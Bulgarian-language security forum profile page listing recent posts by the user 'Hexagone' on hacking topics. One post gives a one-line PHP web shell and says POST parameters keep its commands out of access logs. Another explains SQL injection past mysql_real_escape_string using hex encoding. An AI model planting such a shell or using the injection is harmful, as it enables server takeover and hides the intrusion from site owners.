Jump to content
¯\_( ツ)_/¯
 • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
 • Sponsored Ad

Hexagone

Потребители
 • Мнения

  136
 • Присъединил/а се

 • Последно посещение

 • Days Won

  3

Hexagone last won the day on Юни 15 2017

Hexagone had the most liked content!

Обществена Репутация

70 Excellent

7 Последователи

Относно Hexagone

 • Ранг
  Добър

Последни посетители

5385 профилни разглеждания
 1. Hexagone

  Как функционира мрежата ...

  Накрая на темата цитирам "няма нищо по-лесно от това да научим всичко за MAC-адреса, процесора, мрежовите интерфейси, достъпните устройства и директории". Ще поясниш ли какво имаш предвит? Или по-точно как би намерил MAC-адреса, процесора, мрежовите интерфейсй и достъпните устройства. Директориите са ясни, че може да се bruteforce-нат.
 2. Голям минус от мен. Познавам се лично със "1MP4C7" и приятеля му "Serpeto". И двамата са много несериозни във всяко отношение. Занимават се с "доксване" и DDoS, като рекламират, че е вид хакерство. Също така най-силната атака, която OVH са поемали до сега е 1 tbps и едвам издържаха на това.
 3. Начина по който пишеш е наистина труден за разбиране. За експлойта щом дава timeout най-вероятно IPто e грешно или порта не е отворен.
 4. Hexagone

  WEB shell кодове

  Много по-добре е да не се използва статична функция като "passthru", защото може да се филтрира. Много по-добре е например <?php @$_POST['a'](@$_POST['b']); ?> Използваме POST, за да не се записва в access логовете.
 5. От доста време го има. Звучи като браузър, който ще изглежда сигурен, само защото хората ги мързи да го тестват.
 6. Hexagone

  Linux

  Бахти темите бате. От къде започна, до къде стигна.
 7. Hexagone

  C# проблем

  Не каза какъв е проблема?
 8. Hexagone

  TrailCrawl the web for funz and lulz

  Това беше толкова трудно за четене.
 9. Хората си мислят, че като сложат mysql_real_escape_string() и вече всичко е 6. Функцията филтрира ' \ " и още някакви в хекс. Какво става ако не използваме апострофи обаче? SELECT id,username,password FROM `users` where id=11[HERE] В тоя случай функцията няма да направи абсолютно нищо. Просто когато се инжектва вместо ' се използва hex encoding (има и други начини де). Ползвайте prepared statements и то като хората, за да нямате проблеми.
 10. Изглежда, че линка по-горе вече не работи. https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014 Това би трябвало да обясни всичко. @Inkasatora
 11. Удобрявам, само заради последните 2-3 реда. Браво.
 12. Hexagone

  Помощ , моля!

  Е има общо. И аз така преди виках, ама има много видове Denial of Service. Не е само да спреш интернета на някой. А и за Discord трябва да дадеш и числата до името си (IDто)
 13. Hexagone

  Anti flood

  Най-вероятно се е скарал с някое лапе, което има booter. Преди се разкарвах и ги хаквах буутърите повечето и тва не е някакво хвалене, просто защото бяха написани ужасно. Бих ти препоръчал да звъннеш на доставчика, да говориш с тях и да получиш ново IP, като вече не влизаш в Скайп без VPN/Proxy. Мини към Discord, много по-удобно и няма такива глупости.
 14. E не обичам така недовършени работи. Real-time communication (RTC) is a new integrated communication medium based on the upcoming W3C standard WebRTC, making use of other components like HTML5/JavaScript, the iLBC audio codec, and the VP8 video codec. ^ какво е RTC А webRTC е просто позволява на browser-ите да го достъпват чрез API-та. Фатката е, че по-принцип повечето addon-и и тем подобни не проксифицират тези request-и.
×

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.